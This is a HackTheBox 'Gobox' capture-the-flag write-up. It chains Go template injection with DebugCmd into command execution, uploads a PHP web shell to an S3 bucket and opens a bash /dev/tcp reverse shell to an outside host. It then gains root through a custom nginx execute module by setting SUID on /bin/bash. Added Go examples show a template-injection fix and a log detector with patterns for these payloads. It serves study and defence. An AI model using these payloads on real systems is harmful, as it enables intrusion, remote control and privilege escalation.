HackTheBox Gobox Writeup
Explore the fundamentals of cybersecurity in the Gobox Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.113 gobox.htb
Script to add hosts automatically
ip="10.10.11.113"
domain="gobox.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV gobox.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-30 02:46 CEST
Nmap scan report for gobox.htb (10.10.11.113)
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http nginx
|_http-title: Hacking eSports | {{.Title}}
8080/tcp open http nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Identify the Vulnerability
- The target site at http://gobox.htb:8080/ is running a Go-based application, as indicated by the X-Forwarded-Server: golang header in Burp Suite responses.
- Based on the response, you've found that the application could be vulnerable to Server-Side Template Injection (SSTI) using Go templates.
Initial SSTI Test
- On the /forgot page, insert the payload {{ . }} in the email field to test for template injection.
- If the field is vulnerable, this will reveal Go template context variables or throw an error exposing internal details of the server.
Exploiting DebugCmd
- After successfully logging in with the credentials sent via email from the /forgot page, the source code of the application is revealed.
- You discover the DebugCmd function in the template engine, which allows the execution of system commands.
Test system commands using the following payloads:
{{ .DebugCmd "id" }} // Check for user privileges
{{ .DebugCmd "env" }} // View environment variables
{{ .DebugCmd "aws s3 ls s3://" }} // List S3 buckets
{{ .DebugCmd "aws s3 ls s3://website" }} // List contents of a specific bucket
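The two findings above (template directives evaluated from the email field, and DebugCmd being callable from a template) share one root cause: untrusted input reaches the template source, and the value handed to the template exposes an exported method that does something privileged. The Go program below is an added example, not code from the box or from this write-up. RenderUnsafe reproduces the vulnerable pattern, RenderSafe the fix, and Page.Upper is a constructed, harmless stand-in for a method like DebugCmd; all names are assumptions for illustration.

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
	"text/template"
)

// Page is a constructed stand-in for the value a Go web app hands to its templates.
type Page struct {
	Title string
}

// Upper is a harmless exported method standing in for something like DebugCmd:
// every exported method on the value passed to Execute is callable from the
// template source, so whoever controls the source controls what gets called.
func (p Page) Upper(s string) string { return strings.ToUpper(s) }

// RenderUnsafe splices user input into the template source before parsing.
// Directives inside the input are parsed and executed: this is the SSTI pattern.
func RenderUnsafe(userInput string, data Page) (string, error) {
	tmpl, err := template.New("page").Parse("Hello " + userInput)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, data); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// safeTmpl is parsed once from a fixed, developer-written source.
var safeTmpl = template.Must(template.New("page").Parse("Hello {{ .Input }}"))

// view is the only value the fixed template sees: plain fields and no methods
// with side effects, so nothing like DebugCmd is reachable even by accident.
type view struct {
	Input string
}

// RenderSafe passes user input as data only; {{ }} inside the input is
// rendered as literal text and never parsed as a directive.
func RenderSafe(userInput string) (string, error) {
	var buf bytes.Buffer
	if err := safeTmpl.Execute(&buf, view{Input: userInput}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	probe := `{{ .Upper "id" }}` // same shape as {{ .DebugCmd "id" }} in the write-up
	unsafeOut, err := RenderUnsafe(probe, Page{Title: "Home"})
	fmt.Printf("unsafe: %q err=%v\n", unsafeOut, err) // the method runs: "Hello ID"
	safeOut, err := RenderSafe(probe)
	fmt.Printf("safe:   %q err=%v\n", safeOut, err) // literal text: "Hello {{ .Upper \"id\" }}"
}
```

For pages that emit HTML, html/template is the right package because it context-escapes the data values; it does not change the lesson here, because escaping applies to data, not to template source. The fix is keeping the source fixed and the view model free of privileged methods, whichever template package is used.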
Preparing the Payload
- The goal is to upload a PHP web shell to the S3 bucket via the AWS CLI exposed through DebugCmd.
- First, generate the base64-encoded PHP shell:
# The nested single quotes close and reopen the shell string, so the text that is
# actually encoded is <?php system($_GET[cmd]); ?> with a bare, unquoted cmd.
echo '<?php system($_GET['cmd']); ?>' | base64
This will output the encoded payload:
PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
- Use DebugCmd to decode and save this as a PHP file on the target system, and then upload it to the S3 bucket:
{{ .DebugCmd "echo -n PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= | base64 -d > /tmp/evil.php" }}
{{ .DebugCmd "aws s3 cp /tmp/evil.php s3://website/evil.php" }}
Accessing the Payload
- Once the reverse shell script is uploaded, it can be accessed via:
You can then execute commands by passing the cmd parameter.
Triggering the Reverse Shell
To establish a reverse shell, use the following bash command:
bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'
Since this needs to be URL-encoded, use sed to encode only the & and / characters:
echo -n "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'" | sed -e 's:/:%2f:g' -e 's:&:%26:g'
Setting Up a Listener
On your local machine, set up a listener to catch the reverse shell:
nc -lvnp 9001
Triggering the Shell
To trigger the reverse shell, visit:
http://gobox.htb/evil.php?cmd=bash -c '%2fbin%2fbash -i >%26 %2fdev%2ftcp%2f10.10.14.2%2f9001 0>%261'
Get an Interactive Shell
Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Nginx Module Exploitation (ngx_http_execute_module)
Initial Enumeration
Retrieve the user flag from /home/ubuntu/user.txt:
cat /home/ubuntu/user.txt
Investigate Nginx configuration:
ls /etc/nginx/sites-enabled
cat /etc/nginx/sites-enabled/default
You find the custom directive command on;, which is not part of the default Nginx setup, indicating a custom module.
Identifying the Custom Module
A Google search for command on; nginx github reveals the NginxExecute module, which allows command execution via Nginx.
Verifying the Nginx Module
- To confirm the presence of this module and its functionality, inspect the module binary for references to the run function:
strings /usr/share/nginx/modules/ngx_http_execute_module.so | grep run
Command Execution
Use the ippsec.run parameter in HTTP requests to execute system commands. Test with a basic command:
curl -g "http://127.0.0.1:8000/?ippsec.run[id]"
curl -g "http://127.0.0.1:8000/?ippsec.run[cat /root/root.txt]"
curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 4755 /bin/bash]"
/bin/bash -p
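From the defender's side, the requests used in this write-up leave recognisable traces in the nginx access log on ports 80 and 8080: the ippsec.run[...] trigger of the custom module, bash's /dev/tcp/ redirection inside the evil.php query string, and {{ template delimiters in any GET parameter. The Go program below is an added example, not part of the write-up or the box: it parses combined-format log lines, URL-decodes each request target up to three times so percent-encoding such as %2f does not hide the payload, and reports every rule match. The log lines in SampleLog are constructed to mirror the requests above and are not real logs from the machine; all names are assumptions.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding records one access-log line that matched one detection rule.
type Finding struct {
	LineNo int
	Client string
	Rule   string
	Target string // request target after URL-decoding
}

// nginx "combined" format: client ident user [time] "METHOD target HTTP/x" status ...
// The target is matched lazily so a target containing spaces still parses.
var logLine = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.+?) (HTTP/[\d.]+)" (\d{3})`)

// Each rule is a substring searched for in the decoded request target.
// All three strings are taken from the techniques shown in this write-up.
var rules = []struct{ Name, Needle string }{
	{"go-template-delimiter", "{{"},        // SSTI probing such as {{ . }}
	{"ngx-execute-trigger", "ippsec.run["}, // trigger parameter of the custom nginx module
	{"reverse-shell-device", "/dev/tcp/"},  // bash /dev/tcp redirection inside a query string
}

// decodeFully URL-decodes until the text stops changing (at most 3 rounds),
// so single or double percent-encoding does not hide a payload.
func decodeFully(s string) string {
	for i := 0; i < 3; i++ {
		d, err := url.PathUnescape(s)
		if err != nil || d == s {
			break
		}
		s = d
	}
	return s
}

// FlagSuspiciousRequests returns one Finding per (line, rule) match.
// Lines that do not parse as combined format are skipped.
func FlagSuspiciousRequests(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		m := logLine.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		target := decodeFully(m[4])
		for _, r := range rules {
			if strings.Contains(target, r.Needle) {
				out = append(out, Finding{LineNo: i + 1, Client: m[1], Rule: r.Name, Target: target})
			}
		}
	}
	return out
}

// SampleLog is constructed test data modelled on the requests in this write-up;
// it is not a real log from the box. Line 1 shows that a POST body (where the
// {{ . }} probe against /forgot travels) never appears in the access log at all.
var SampleLog = []string{
	`10.10.14.2 - - [30/Sep/2024:02:50:01 +0200] "POST /forgot HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
	`10.10.14.2 - - [30/Sep/2024:02:58:12 +0200] "GET /evil.php?cmd=bash%20-c%20'%2fbin%2fbash%20-i%20>%26%20%2fdev%2ftcp%2f10.10.14.2%2f9001%200>%261' HTTP/1.1" 200 0 "-" "Mozilla/5.0"`,
	`127.0.0.1 - - [30/Sep/2024:03:05:44 +0200] "GET /?ippsec.run[id] HTTP/1.1" 200 39 "-" "curl/7.68.0"`,
	`10.10.14.2 - - [30/Sep/2024:03:06:02 +0200] "GET /?q=%7B%7B%20.%20%7D%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"`,
	`10.10.14.5 - - [30/Sep/2024:03:07:30 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"`,
}

func main() {
	for _, f := range FlagSuspiciousRequests(SampleLog) {
		fmt.Printf("line %d from %s matched %s: %s\n", f.LineNo, f.Client, f.Rule, f.Target)
	}
}
```

Running it reports three of the five sample lines: the evil.php request (reverse-shell-device), the ippsec.run[id] request (ngx-execute-trigger) and the encoded {{ . }} probe (go-template-delimiter). The POST to /forgot is not flagged because nginx does not log request bodies; catching that probe needs application-side logging of form fields or an inspecting proxy in front of the app. The ippsec.run[id] line also shows why a loopback client address is worth alerting on here: the module on port 8000 is reached from the box itself.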